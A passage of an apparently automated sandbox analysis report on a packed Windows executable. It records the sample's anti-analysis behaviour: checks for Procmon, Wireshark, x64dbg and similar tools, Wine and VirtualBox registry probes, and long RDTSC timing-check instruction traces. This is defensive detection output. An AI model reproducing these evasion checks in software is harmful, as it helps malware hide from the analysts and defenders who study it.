Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: kernel.appcore.dllJump to behavior
Source: ZFttiy4Tt8.exeStatic file information: File size 4528640 > 1048576
Source: ZFttiy4Tt8.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: ZFttiy4Tt8.exeStatic PE information: Raw size of ivnslrrb is bigger than: 0x100000 < 0x1c5400

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeUnpacked PE file: 2.2.ZFttiy4Tt8.exe.df0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ivnslrrb:EW;jopxztyl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ivnslrrb:EW;jopxztyl:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: ZFttiy4Tt8.exeStatic PE information: real checksum: 0x45f077 should be: 0x455c78
Source: ZFttiy4Tt8.exeStatic PE information: section name:
Source: ZFttiy4Tt8.exeStatic PE information: section name: .idata
Source: ZFttiy4Tt8.exeStatic PE information: section name:
Source: ZFttiy4Tt8.exeStatic PE information: section name: ivnslrrb
Source: ZFttiy4Tt8.exeStatic PE information: section name: jopxztyl
Source: ZFttiy4Tt8.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C85DD push ds; ret 2_3_008C85E9
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C85DD push ds; ret 2_3_008C85E9
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008CE559 push cs; iretd 2_3_008CE569
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008CE559 push cs; iretd 2_3_008CE569
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C877C push edx; ret 2_3_008C8789
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C877C push edx; ret 2_3_008C8789
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C85DD push ds; ret 2_3_008C85E9
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C85DD push ds; ret 2_3_008C85E9
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008CE559 push cs; iretd 2_3_008CE569
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008CE559 push cs; iretd 2_3_008CE569
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C877C push edx; ret 2_3_008C8789
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C877C push edx; ret 2_3_008C8789
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C85DD push ds; ret 2_3_008C85E9
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C85DD push ds; ret 2_3_008C85E9
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008CE559 push cs; iretd 2_3_008CE569
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008CE559 push cs; iretd 2_3_008CE569
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C877C push edx; ret 2_3_008C8789
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C877C push edx; ret 2_3_008C8789
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C85DD push ds; ret 2_3_008C85E9
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C85DD push ds; ret 2_3_008C85E9
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008CE559 push cs; iretd 2_3_008CE569
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008CE559 push cs; iretd 2_3_008CE569
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C877C push edx; ret 2_3_008C8789
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_3_008C877C push edx; ret 2_3_008C8789
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_011741D0 push eax; mov dword ptr [esp], edx2_2_011741D5
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00E72340 push eax; mov dword ptr [esp], 00000000h2_2_00E72343
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00EAC7F0 push eax; mov dword ptr [esp], 00000000h2_2_00EAC743
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00E30AC0 push eax; mov dword ptr [esp], 00000000h2_2_00E30AC4
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00E51430 push eax; mov dword ptr [esp], 00000000h2_2_00E51433
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00E739A0 push eax; mov dword ptr [esp], 00000000h2_2_00E739A3
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00E4DAD0 push eax; mov dword ptr [esp], edx2_2_00E4DAD1
Source: ZFttiy4Tt8.exeStatic PE information: section name: ivnslrrb entropy: 7.955475045686641

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 14D2403 second address: 14D2408 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16583C8 second address: 16583CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16583CC second address: 16583DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FB6E8B0C7E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16583DE second address: 16583E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1641328 second address: 1641338 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jo 00007FB6E8B0C7E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 165750E second address: 1657514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1657514 second address: 1657531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0C7F7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1657531 second address: 1657536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1657536 second address: 1657550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1657550 second address: 1657555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16576EE second address: 16576FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FB6E8B0C7E6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16576FD second address: 1657713 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB6E8B0AED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jnp 00007FB6E8B0AEDEh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16595B6 second address: 16595BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 165962D second address: 1659635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 165976B second address: 165976F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16597B8 second address: 16597D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16597D1 second address: 16597DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB6E8B0C7E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1659904 second address: 1659913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 165997D second address: 1659981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1659981 second address: 1659A1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FB6E8B0AED8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jmp 00007FB6E8B0AEDBh 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d mov dword ptr [ebp+129C586Ch], edx 0x00000033 pop edi 0x00000034 push 9C732650h 0x00000039 jmp 00007FB6E8B0AEDAh 0x0000003e add dword ptr [esp], 638CDA30h 0x00000045 jmp 00007FB6E8B0AEDBh 0x0000004a push 00000003h 0x0000004c movsx ecx, si 0x0000004f push 00000000h 0x00000051 or esi, dword ptr [ebp+129C2BFEh] 0x00000057 push 00000003h 0x00000059 mov esi, dword ptr [ebp+129C346Dh] 0x0000005f call 00007FB6E8B0AED9h 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FB6E8B0AEDFh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1659A1D second address: 1659A50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB6E8B0C7F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1659A50 second address: 1659A5E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB6E8B0AED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1659A5E second address: 1659A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push ecx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop ecx 0x00000013 jo 00007FB6E8B0C7ECh 0x00000019 ja 00007FB6E8B0C7E6h 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 jo 00007FB6E8B0C7FCh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1659A98 second address: 1659AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e ja 00007FB6E8B0AED8h 0x00000014 pop edi 0x00000015 pop eax 0x00000016 mov dword ptr [ebp+129C2E1Eh], edi 0x0000001c lea ebx, dword ptr [ebp+12B4B520h] 0x00000022 mov dword ptr [ebp+129C17A6h], edi 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a jmp 00007FB6E8B0AEDAh 0x0000002f pushad 0x00000030 jmp 00007FB6E8B0AEDFh 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 popad 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push edx 0x0000003d jmp 00007FB6E8B0AEDEh 0x00000042 pop edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167BFAC second address: 167BFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 163A97E second address: 163A997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB6E8B0AED6h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FB6E8B0AED6h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 163A997 second address: 163A99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167A281 second address: 167A285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167A285 second address: 167A28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167A934 second address: 167A950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167AAD6 second address: 167AADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167AADC second address: 167AAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167ADBB second address: 167ADC0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167AEF9 second address: 167AF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0AEDEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167AF0D second address: 167AF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 164CF66 second address: 164CF6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 164CF6E second address: 164CF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 164CF74 second address: 164CF7E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB6E8B0AED6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167B1E6 second address: 167B201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0C7F7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167B733 second address: 167B737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167B883 second address: 167B889 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167BB14 second address: 167BB59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FB6E8B0AEE5h 0x0000000c jnl 00007FB6E8B0AED6h 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007FB6E8B0AED6h 0x0000001d jmp 00007FB6E8B0AEE8h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167BB59 second address: 167BB5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167BB5D second address: 167BB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167BB6B second address: 167BB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167BDBB second address: 167BDBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167BDBF second address: 167BDEC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB6E8B0C7E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007FB6E8B0C7E8h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jp 00007FB6E8B0C7E6h 0x0000001c push edx 0x0000001d pop edx 0x0000001e jne 00007FB6E8B0C7E6h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167BDEC second address: 167BDF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 167DFC0 second address: 167DFCA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB6E8B0C7ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1682907 second address: 1682922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1684219 second address: 168421D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1687FAA second address: 1687FAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1687B54 second address: 1687B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1687B58 second address: 1687B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168AF8A second address: 168AF90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168AF90 second address: 168AF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168B513 second address: 168B519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168B74F second address: 168B753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168D054 second address: 168D058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168D5D6 second address: 168D5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168E0A4 second address: 168E0B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0C7F0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168E0B8 second address: 168E0BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
